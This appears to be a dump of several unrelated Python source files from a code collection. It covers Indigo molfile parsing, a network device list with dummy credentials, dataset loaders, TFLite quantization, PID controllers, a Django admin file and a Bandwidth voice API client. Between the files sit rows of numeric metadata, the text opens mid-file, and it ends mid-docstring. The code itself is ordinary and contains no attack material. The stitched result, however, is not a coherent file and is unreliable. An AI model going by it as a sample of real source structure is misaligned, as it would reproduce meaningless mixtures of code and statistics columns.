2 7 1 0 0 0 0
7 8 1 0 0 0 0
M RGP 2 1 1 8 2
M LOG 1 2 1 1 0,1
M END
$END CTAB
$RGP
2
$CTAB
1 0 0 0 0 999 V2000
4.0752 -5.2594 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$RGP
1
$CTAB
3 2 0 0 0 999 V2000
4.0752 -2.3719 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
4.7897 -2.7844 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.5042 -2.3719 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.smiles())

# R-group fragments that themselves carry attachment points (M APO).
mol = indigo.loadMolecule('''$MDL REV 1 0212181244
$MOL
$HDR
Mrv0541 02121812442D
$END HDR
$CTAB
4 3 0 0 0 0 999 V2000
0.4125 0.7145 0.0000 Cl 0 0 0 0 0 0 0 0 0 0 0 0
0.0000 -0.0000 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
0.4125 -0.7145 0.0000 Br 0 0 0 0 0 0 0 0 0 0 0 0
-0.8250 -0.0000 0.0000 I 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
2 4 1 0 0 0 0
M LOG 1 1 0 0
M RGP 1 2 1
M END
$END CTAB
$RGP
1
$CTAB
7 6 0 0 0 0 999 V2000
3.8304 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
4.5448 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.2593 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.9738 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
5.9738 -3.7125 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
6.6882 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
7.4027 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
4 6 1 0 0 0 0
6 7 1 0 0 0 0
M APO 2 5 2 7 1
M END
$END CTAB
$CTAB
7 6 0 0 0 0 999 V2000
10.7100 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
11.4245 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
12.1390 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
12.8535 -2.8875 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
12.8535 -3.7125 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
13.5679 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.2824 -2.8875 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
4 6 1 0 0 0 0
6 7 1 0 0 0 0
M APO 2 5 2 7 1
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.smiles())

# --- R-groups given inline via CurlySMILES extensions ---
m = indigo.loadMolecule("C1O[*]CO[*]1 |$;;_R2;;;_R1$,RG:_R1={C},{N},_R2={C},{N}|")
print(m.molfile())
# R-group definitions with occurrence logic in the SMILES extension block.
m = indigo.loadMolecule("[*]C1CCCCC1[*] |$_R1;;;;;;;_R2$,RG:_R1={CCC},_R2={N},LOG={_R1:;;>0._R2:_R1;H;0,1}|")
print(m.molfile())
# R-group table with no root structure at all.
m = indigo.loadMolecule("|RG:_R1={CCCCCC}|")
print(m.molfile())
| 25.866426
| 109
| 0.470063
| 1,652
| 7,165
| 2.023608
| 0.085351
| 0.39665
| 0.507927
| 0.564762
| 0.736763
| 0.717021
| 0.656596
| 0.591086
| 0.577326
| 0.530362
| 0
| 0.457335
| 0.440614
| 7,165
| 276
| 110
| 25.960145
| 0.376747
| 0
| 0
| 0.611336
| 0
| 0.194332
| 0.801954
| 0.018562
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016194
| 0
| 0.016194
| 0.068826
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2beaf98239ba1061015093c017c547c6801a3f40
| 3,443
|
py
|
Python
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T13:53:32.000Z
|
2018-05-08T13:53:32.000Z
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T12:09:10.000Z
|
2018-05-08T12:09:10.000Z
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T12:06:11.000Z
|
2018-05-08T12:06:11.000Z
|
# name: csc_devices.py
# desc: lists all devices with devicename, IP, username, password, secret


def _device(device_name, ip):
    """Return a netmiko-style connection dict for one Cisco NX-OS device.

    Only the device name and management IP vary between devices; the
    credentials, port and flags are identical placeholders for every entry.
    """
    return {
        'device_name': device_name,
        'device_type': 'cisco_nxos',
        'ip': ip,
        'username': 'dummy_username',
        'password': 'dummy_password',
        'port': 22,
        'verbose': False,
        'secret': 'dummy_secret',
    }


# Module-level names are preserved so existing imports keep working.
router_013 = _device('router_013', '1.1.1.10')
router_023 = _device('router_023', '1.1.1.11')
router_014 = _device('router_014', '1.1.1.26')
router_024 = _device('router_024', '1.1.1.27')
switch_013 = _device('switch_013', '1.1.1.3')
switch_023 = _device('switch_023', '1.1.1.4')
switch_033 = _device('switch_033', '1.1.1.5')
switch_043 = _device('switch_043', '1.1.1.6')
switch_053 = _device('switch_053', '1.1.1.7')
switch_063 = _device('switch_063', '1.1.1.8')
switch_014 = _device('switch_014', '1.1.1.19')
switch_024 = _device('switch_024', '1.1.1.20')
switch_034 = _device('switch_034', '1.1.1.21')
switch_044 = _device('switch_044', '1.1.1.22')
switch_054 = _device('switch_054', '1.1.1.23')
switch_064 = _device('switch_064', '1.1.1.24')
| 156.5
| 208
| 0.665699
| 462
| 3,443
| 4.681818
| 0.112554
| 0.029589
| 0.110957
| 0.140546
| 0.799815
| 0.799815
| 0.799815
| 0.799815
| 0.711049
| 0.611188
| 0
| 0.06514
| 0.099332
| 3,443
| 21
| 209
| 163.952381
| 0.632377
| 0.026721
| 0
| 0
| 0
| 0
| 0.599519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2bff91c780002f7b5b0e456b779cc5adda1089de
| 3,791
|
py
|
Python
|
torchcmh/dataset/__init__.py
|
chrisbyd/deep-cross-modal-hashing
|
b67bed412a499fdb619769d5132d897f5910c433
|
[
"MIT"
] | 65
|
2019-12-08T12:11:53.000Z
|
2022-03-10T09:25:45.000Z
|
torchcmh/dataset/__init__.py
|
silencelzx/deep-cross-modal-hashing
|
9784397c1076c81b43ebd856cb24b8a67cf8f41e
|
[
"MIT"
] | 17
|
2020-05-07T09:22:20.000Z
|
2022-03-02T02:05:18.000Z
|
torchcmh/dataset/__init__.py
|
silencelzx/deep-cross-modal-hashing
|
9784397c1076c81b43ebd856cb24b8a67cf8f41e
|
[
"MIT"
] | 17
|
2020-04-02T06:38:49.000Z
|
2022-01-11T12:41:49.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/7/13
# @Author : Godder
# @Github : https://github.com/WangGodder
import os

# Absolute directory of this package on disk; exported so callers can locate
# files shipped alongside the dataset package.
abs_dir = os.path.dirname(__file__)
# Public API: the dataset factory functions plus the package directory path.
__all__ = ['single_data', 'pairwise_data', 'triplet_data', 'triplet_rank_data', 'quadruplet_data', "abs_dir"]
def triplet_data(dataset_name: str, img_dir: str, **kwargs):
    """Build triplet-sampling datasets for the named benchmark.

    Args:
        dataset_name: dataset alias, matched case-insensitively.
        img_dir: directory holding the dataset images.
        **kwargs: forwarded unchanged to the dataset factory.

    Raises:
        ValueError: if the dataset name is not recognized.
    """
    name = dataset_name.lower()
    if name == 'mirflickr25k':
        from torchcmh.dataset.mirflckr25k import get_triplet_datasets
    elif name in ('nus wide', 'nuswide'):
        from torchcmh.dataset.nus_wide import get_triplet_datasets
    elif name in ('coco2014', 'coco', 'mscoco', 'ms coco'):
        from torchcmh.dataset.coco2014 import get_triplet_datasets
    elif name in ('iapr tc-12', 'iapr', 'tc-12', 'tc12'):
        from torchcmh.dataset.tc12 import get_triplet_datasets
    else:
        raise ValueError("there is no dataset name is %s" % dataset_name)
    return get_triplet_datasets(img_dir, **kwargs)
def single_data(dataset_name: str, img_dir: str, **kwargs):
    """Build single-sample datasets for the named benchmark.

    Args:
        dataset_name: dataset alias, matched case-insensitively.
        img_dir: directory holding the dataset images.
        **kwargs: forwarded unchanged to the dataset factory.

    Raises:
        ValueError: if the dataset name is not recognized.
    """
    name = dataset_name.lower()
    if name == 'mirflickr25k':
        from torchcmh.dataset.mirflckr25k import get_single_datasets
    elif name in ('nus wide', 'nuswide'):
        from torchcmh.dataset.nus_wide import get_single_datasets
    elif name in ('coco2014', 'coco', 'mscoco', 'ms coco'):
        from torchcmh.dataset.coco2014 import get_single_datasets
    elif name in ('iapr tc-12', 'iapr', 'tc-12', 'tc12'):
        from torchcmh.dataset.tc12 import get_single_datasets
    else:
        raise ValueError("there is no dataset name is %s" % dataset_name)
    return get_single_datasets(img_dir, **kwargs)
def pairwise_data(dataset_name: str, img_dir: str, **kwargs):
    """Build pairwise-sampling datasets for the named benchmark.

    Args:
        dataset_name: dataset alias, matched case-insensitively.
        img_dir: directory holding the dataset images.
        **kwargs: forwarded unchanged to the dataset factory.

    Raises:
        ValueError: if the dataset name is not recognized.
    """
    name = dataset_name.lower()
    if name == 'mirflickr25k':
        from torchcmh.dataset.mirflckr25k import get_pairwise_datasets
    elif name in ('nus wide', 'nuswide'):
        from torchcmh.dataset.nus_wide import get_pairwise_datasets
    elif name in ('coco2014', 'coco', 'mscoco', 'ms coco'):
        from torchcmh.dataset.coco2014 import get_pairwise_datasets
    elif name in ('iapr tc-12', 'iapr', 'tc-12', 'tc12'):
        from torchcmh.dataset.tc12 import get_pairwise_datasets
    else:
        raise ValueError("there is no dataset name is %s" % dataset_name)
    return get_pairwise_datasets(img_dir, **kwargs)
def triplet_rank_data(dataset_name: str, img_dir: str, **kwargs):
    """Build triplet-ranking datasets for the named benchmark.

    Note: unlike the other factories, only the canonical aliases are
    accepted here ('mirflickr25k', 'nus wide', 'coco2014', 'iapr tc-12').

    Args:
        dataset_name: dataset alias, matched case-insensitively.
        img_dir: directory holding the dataset images.
        **kwargs: forwarded unchanged to the dataset factory.

    Raises:
        ValueError: if the dataset name is not recognized.
    """
    name = dataset_name.lower()
    if name == 'mirflickr25k':
        from torchcmh.dataset.mirflckr25k import get_triplet_ranking_datasets
    elif name == 'nus wide':
        from torchcmh.dataset.nus_wide import get_triplet_ranking_datasets
    elif name == 'coco2014':
        from torchcmh.dataset.coco2014 import get_triplet_ranking_datasets
    elif name == 'iapr tc-12':
        from torchcmh.dataset.tc12 import get_triplet_ranking_datasets
    else:
        raise ValueError("there is no dataset name is %s" % dataset_name)
    return get_triplet_ranking_datasets(img_dir, **kwargs)
def quadruplet_data(dataset_name: str, img_dir: str, **kwargs):
    """Build quadruplet-sampling datasets for the named benchmark.

    Note: only the canonical aliases are accepted here
    ('mirflickr25k', 'nus wide', 'coco2014', 'iapr tc-12').

    Args:
        dataset_name: dataset alias, matched case-insensitively.
        img_dir: directory holding the dataset images.
        **kwargs: forwarded unchanged to the dataset factory.

    Raises:
        ValueError: if the dataset name is not recognized.
    """
    name = dataset_name.lower()
    if name == 'mirflickr25k':
        from torchcmh.dataset.mirflckr25k import get_quadruplet_datasets
    elif name == 'nus wide':
        from torchcmh.dataset.nus_wide import get_quadruplet_datasets
    elif name == 'coco2014':
        from torchcmh.dataset.coco2014 import get_quadruplet_datasets
    elif name == 'iapr tc-12':
        from torchcmh.dataset.tc12 import get_quadruplet_datasets
    else:
        raise ValueError("there is no dataset name is %s" % dataset_name)
    return get_quadruplet_datasets(img_dir, **kwargs)
| 45.674699
| 109
| 0.712741
| 503
| 3,791
| 5.129225
| 0.125249
| 0.149225
| 0.124031
| 0.133721
| 0.889535
| 0.851163
| 0.851163
| 0.845736
| 0.834109
| 0.798837
| 0
| 0.031969
| 0.174888
| 3,791
| 82
| 110
| 46.231707
| 0.792839
| 0.026642
| 0
| 0.47619
| 0
| 0
| 0.142741
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.333333
| 0
| 0.492063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
921de11a93487d67a148ccae3b13bd836d808d5e
| 5,781
|
py
|
Python
|
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | 1
|
2021-04-22T11:59:19.000Z
|
2021-04-22T11:59:19.000Z
|
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | null | null | null |
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | null | null | null |
### tensorflow-gpu==1.15.2
import tensorflow as tf
import numpy as np

# Every frozen graph "<model>.pb" is weight-quantized once per input
# resolution, producing "<model>_<d0>x<d1>_weight_quant.tflite".
_MODELS = ("bodypix_025", "bodypix_050", "bodypix_075", "bodypix_100")
_RESOLUTIONS = ((640, 480), (320, 240))
_INPUT_NAME = "sub"
_OUTPUT_ARRAYS = ['output_raw_heatmaps', 'output_raw_offsets',
                  'output_raw_part_heatmaps/conv', 'output_raw_segments']


def _weight_quantize(model_name, dim0, dim1):
    """Weight-quantize one frozen graph (input/output stay float32).

    Args:
        model_name: basename of the frozen graph, without the ".pb" suffix.
        dim0: first spatial dimension of the fixed input [1, dim0, dim1, 3].
        dim1: second spatial dimension of the fixed input.
    """
    converter = tf.lite.TFLiteConverter.from_frozen_graph(
        "%s.pb" % model_name,
        [_INPUT_NAME],
        _OUTPUT_ARRAYS,
        {_INPUT_NAME: [1, dim0, dim1, 3]})
    # Weight-only quantization: weights stored quantized, float32 interface.
    converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
    tflite_quant_model = converter.convert()
    out_name = '%s_%dx%d_weight_quant.tflite' % (model_name, dim0, dim1)
    with open(out_name, 'wb') as w:
        w.write(tflite_quant_model)
    print("Weight Quantization complete! - %s" % out_name)


# Same conversion order as the original script: per model, 640x480 then 320x240.
for _model in _MODELS:
    for _dim0, _dim1 in _RESOLUTIONS:
        _weight_quantize(_model, _dim0, _dim1)
| 47
| 84
| 0.738281
| 749
| 5,781
| 5.313752
| 0.080107
| 0.072362
| 0.048241
| 0.058291
| 0.986935
| 0.986935
| 0.980905
| 0.980905
| 0.980905
| 0.980905
| 0
| 0.051429
| 0.152396
| 5,781
| 123
| 85
| 47
| 0.760816
| 0.063311
| 0
| 0.816327
| 0
| 0
| 0.321244
| 0.158401
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.081633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
47241e46116a1b3bda3c4233a36fd193be2ab023
| 4,909
|
py
|
Python
|
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
"""
pid_control
- Beard & McLain, PUP, 2012
- Last Update:
2/6/2019 - RWB
"""
import sys
import numpy as np
sys.path.append('..')
class pidControl:
    """PID controller (Beard & McLain, "Small Unmanned Aircraft", 2012).

    Combines a proportional term, a trapezoidal-rule integrator and a
    band-limited ("dirty") derivative, then saturates the command at
    +/- limit with integral anti-windup.
    """
    def __init__(self, kp=0.0, ki=0.0, kd=0.0, Ts=0.01, sigma=0.05, limit=1.0):
        # gains, sample period and output bound
        self.kp = kp
        self.ki = ki
        self.kd = kd
        self.Ts = Ts
        self.limit = limit
        # controller state
        self.integrator = 0.0
        self.error_delay_1 = 0.0
        self.error_dot_delay_1 = 0.0
        self.y_dot = 0.0
        self.y_delay_1 = 0.0
        self.y_dot_delay_1 = 0.0
        # dirty-derivative filter coefficients (sigma = filter time constant)
        self.a1 = (2.0 * sigma - Ts) / (2.0 * sigma + Ts)
        self.a2 = 2.0 / (2.0 * sigma + Ts)

    def update(self, y_ref, y, reset_flag=False):
        """Advance the controller one sample; return the saturated command."""
        if reset_flag is True:
            # wipe the stored state before computing this step
            self.integrator = 0.0
            self.error_delay_1 = 0.0
            self.y_dot = 0.0
            self.y_delay_1 = 0.0
            self.y_dot_delay_1 = 0.0
        error = y_ref - y
        # trapezoidal-rule integration of the error
        self.integrator += (self.Ts / 2) * (error + self.error_delay_1)
        # band-limited differentiation of the error
        error_dot = self.a1 * self.error_dot_delay_1 + self.a2 * (error - self.error_delay_1)
        # raw PID command, then saturation
        u = self.kp * error + self.ki * self.integrator + self.kd * error_dot
        u_sat = self._saturate(u)
        # anti-windup: pull the integrator back while the output is saturated
        if np.abs(self.ki) > 0.0001:
            self.integrator += (self.Ts / self.ki) * (u_sat - u)
        # age the delayed signals for the next sample
        self.error_delay_1 = error
        self.error_dot_delay_1 = error_dot
        return u_sat

    def update_with_rate(self, y_ref, y, ydot, reset_flag=False):
        """PID step using a measured rate ydot instead of a differentiated error."""
        if reset_flag is True:
            self.integrator = 0.0
            self.error_delay_1 = 0.0
        error = y_ref - y
        # trapezoidal-rule integration of the error
        self.integrator += (self.Ts / 2) * (error + self.error_delay_1)
        # the derivative term damps on the measured rate (note the minus sign)
        u = self.kp * error + self.ki * self.integrator - self.kd * ydot
        u_sat = self._saturate(u)
        # anti-windup: pull the integrator back while the output is saturated
        if np.abs(self.ki) > 0.0001:
            self.integrator += (self.Ts / self.ki) * (u_sat - u)
        self.error_delay_1 = error
        return u_sat

    def _saturate(self, u):
        # clamp the command to [-limit, +limit]
        if u >= self.limit:
            return self.limit
        if u <= -self.limit:
            return -self.limit
        return u
class piControl:
    """PI controller with trapezoidal integrator, output saturation and
    integral anti-windup (companion to pidControl, derivative term omitted)."""
    def __init__(self, kp=0.0, ki=0.0, Ts=0.01, limit=1.0):
        # gains, sample period and output bound
        self.kp = kp
        self.ki = ki
        self.Ts = Ts
        self.limit = limit
        # controller state
        self.integrator = 0.0
        self.error_delay_1 = 0.0

    def update(self, y_ref, y):
        """Advance the controller one sample; return the saturated command."""
        error = y_ref - y
        # trapezoidal-rule integration of the error
        self.integrator += (self.Ts / 2) * (error + self.error_delay_1)
        # raw PI command, then saturation
        u = self.kp * error + self.ki * self.integrator
        u_sat = self._saturate(u)
        # anti-windup: pull the integrator back while the output is saturated
        if np.abs(self.ki) > 0.0001:
            self.integrator += (self.Ts / self.ki) * (u_sat - u)
        # age the delayed error for the next sample
        self.error_delay_1 = error
        return u_sat

    def _saturate(self, u):
        # clamp the command to [-limit, +limit]
        if u >= self.limit:
            return self.limit
        if u <= -self.limit:
            return -self.limit
        return u
class pdControlWithRate:
    """PD controller using a measured rate: u = kp*(y_ref - y) - kd*ydot,
    saturated at +/- limit. No integral term, so no anti-windup is needed."""
    def __init__(self, kp=0.0, kd=0.0, limit=1.0):
        # gains and output bound
        self.kp = kp
        self.kd = kd
        self.limit = limit

    def update(self, y_ref, y, ydot):
        """Return the saturated PD command for the given reference, output
        and measured output rate."""
        raw = self.kp * (y_ref - y) - self.kd * ydot
        return self._saturate(raw)

    def _saturate(self, u):
        # clamp the command to [-limit, +limit]
        if u >= self.limit:
            return self.limit
        if u <= -self.limit:
            return -self.limit
        return u
| 31.267516
| 79
| 0.522917
| 675
| 4,909
| 3.65037
| 0.125926
| 0.037338
| 0.102273
| 0.066964
| 0.849838
| 0.817776
| 0.789773
| 0.782062
| 0.782062
| 0.750812
| 0
| 0.038298
| 0.377674
| 4,909
| 157
| 80
| 31.267516
| 0.768249
| 0.180892
| 0
| 0.788991
| 0
| 0
| 0.000502
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091743
| false
| 0
| 0.018349
| 0
| 0.201835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
473212d8dcf8dbad85266ed3caee947a0d11cefc
| 176
|
py
|
Python
|
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
from django.contrib import admin

# Single combined import; the original also had a redundant
# "from .models import Topic" line that this import supersedes.
from .models import Entry, Topic

# Expose the learning-log models in the Django admin interface.
admin.site.register(Topic)
admin.site.register(Entry)
| 22
| 32
| 0.801136
| 26
| 176
| 5.423077
| 0.461538
| 0.141844
| 0.22695
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 7
| 33
| 25.142857
| 0.909677
| 0.147727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b616835e8763461ae9323c0befa81098bccbd6c
| 74,324
|
py
|
Python
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 5
|
2020-11-04T14:29:37.000Z
|
2022-02-23T20:33:07.000Z
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 3
|
2021-07-23T18:48:48.000Z
|
2022-03-15T14:59:07.000Z
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 8
|
2020-04-14T09:22:53.000Z
|
2022-03-11T10:46:06.000Z
|
# -*- coding: utf-8 -*-
"""
bandwidth
This file was automatically generated by APIMATIC v3.0 (
https://www.apimatic.io ).
"""
from bandwidth.api_helper import APIHelper
from bandwidth.configuration import Server
from bandwidth.http.api_response import ApiResponse
from bandwidth.voice.controllers.base_controller import BaseController
from bandwidth.http.auth.voice_basic_auth import VoiceBasicAuth
from bandwidth.voice.models.create_call_response import CreateCallResponse
from bandwidth.voice.models.call_state import CallState
from bandwidth.voice.models.call_recording_metadata import CallRecordingMetadata
from bandwidth.voice.models.transcription_response import TranscriptionResponse
from bandwidth.voice.models.conference_state import ConferenceState
from bandwidth.voice.models.conference_member_state import ConferenceMemberState
from bandwidth.voice.models.conference_recording_metadata import ConferenceRecordingMetadata
from bandwidth.voice.exceptions.api_error_exception import ApiErrorException
from bandwidth.exceptions.api_exception import APIException
class APIController(BaseController):
"""A Controller to access Endpoints in the bandwidth API."""
def __init__(self, config, call_back=None):
    # Delegate straight to BaseController, which stores the client
    # configuration and the optional HTTP call-back hook for this controller.
    super(APIController, self).__init__(config, call_back)
def create_call(self,
                account_id,
                body):
    """Create an outbound phone call.

    Performs ``POST /api/v2/accounts/{accountId}/calls``.

    Args:
        account_id (string): Account that will own the call.
        body (CreateCallRequest): Parameters of the call to create.

    Returns:
        ApiResponse: HTTP response wrapper whose body is the decoded
            CreateCallResponse.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls',
        {'accountId': {'value': account_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the JSON POST request.
    req = self.config.http_client.post(
        url,
        headers={'accept': 'application/json',
                 'content-type': 'application/json; charset=utf-8'},
        parameters=APIHelper.json_serialize(body))
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # Decode the JSON payload into the model type and wrap it.
    decoded = APIHelper.json_deserialize(
        resp.text, CreateCallResponse.from_dictionary)
    return ApiResponse(resp, body=decoded)
def get_call(self,
             account_id,
             call_id):
    """Fetch near-realtime metadata about a call.

    Performs ``GET /api/v2/accounts/{accountId}/calls/{callId}``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call to look up.

    Returns:
        ApiResponse: HTTP response wrapper whose body is the decoded
            CallState.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
        APIException: For authentication failures (401) or any other
            unexpected remote error.
    """
    # Resolve the templated path against the voice server base URI.
    path = APIHelper.append_url_with_template_parameters(
        '/api/v2/accounts/{accountId}/calls/{callId}',
        {'accountId': {'value': account_id, 'encode': False},
         'callId': {'value': call_id, 'encode': False}})
    url = APIHelper.clean_url(
        self.config.get_base_uri(Server.VOICEDEFAULT) + path)
    # Build, authenticate and send the GET request.
    req = self.config.http_client.get(
        url, headers={'accept': 'application/json'})
    VoiceBasicAuth.apply(self.config, req)
    resp = self.execute_request(req)
    # Translate known HTTP error statuses into API exceptions.
    errors = {
        400: (ApiErrorException, "Something's not quite right... Your request is invalid. Please fix it before trying again."),
        401: (APIException, 'Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.'),
        403: (ApiErrorException, 'User unauthorized to perform this action.'),
        404: (ApiErrorException, 'The resource specified cannot be found or does not belong to you.'),
        415: (ApiErrorException, "We don't support that media type. If a request body is required, please send it to us as `application/json`."),
        429: (ApiErrorException, "You're sending requests to this endpoint too frequently. Please slow your request rate down and try again."),
        500: (ApiErrorException, 'Something unexpected happened. Please try again.'),
    }
    if resp.status_code in errors:
        exc_cls, message = errors[resp.status_code]
        raise exc_cls(message, resp)
    self.validate_response(resp)
    # Decode the JSON payload into the model type and wrap it.
    decoded = APIHelper.json_deserialize(resp.text, CallState.from_dictionary)
    return ApiResponse(resp, body=decoded)
def modify_call(self,
                account_id,
                call_id,
                body):
    """Interrupt an active call and replace its BXML document.

    Performs ``POST /api/v2/accounts/{accountId}/calls/{callId}``.

    Args:
        account_id (string): Account the call belongs to.
        call_id (string): Identifier of the call to modify.
        body (ModifyCallRequest): Replacement call instructions.

    Returns:
        ApiResponse: HTTP response wrapper; this endpoint returns no body.

    Raises:
        ApiErrorException: For endpoint-specific HTTP error statuses.
